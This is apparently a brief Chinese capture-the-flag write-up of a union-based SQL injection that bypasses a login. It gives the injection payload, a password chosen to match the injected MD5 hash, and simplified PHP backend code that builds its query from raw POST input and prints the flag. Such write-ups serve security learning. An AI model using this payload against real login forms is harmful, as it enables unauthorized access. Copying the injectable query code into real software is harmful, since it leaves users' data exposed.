联合注入查询

    username=1’ union select 1,’admin’,’0f5ed8a8d8d44d86a570aacffa922251’#
    passwd=ca01h
    (ca01h——md5——0f5ed8a8d8d44d86a570aacffa922251)
    即可查询成功
    后端源码简化

    1. <?php
    2. $name = $_POST['name'];
    3. $passwd = md5($_POST['pw']);
    4. $sql = "select * from user where username = '$name'";
    5. $query = mysql_query($sql);
    6. if (!strcasecmp($passwd, $query[passwd])) {
    7. echo $flag;
    8. } else {
    9. echo("Wrong Pass");
    10. }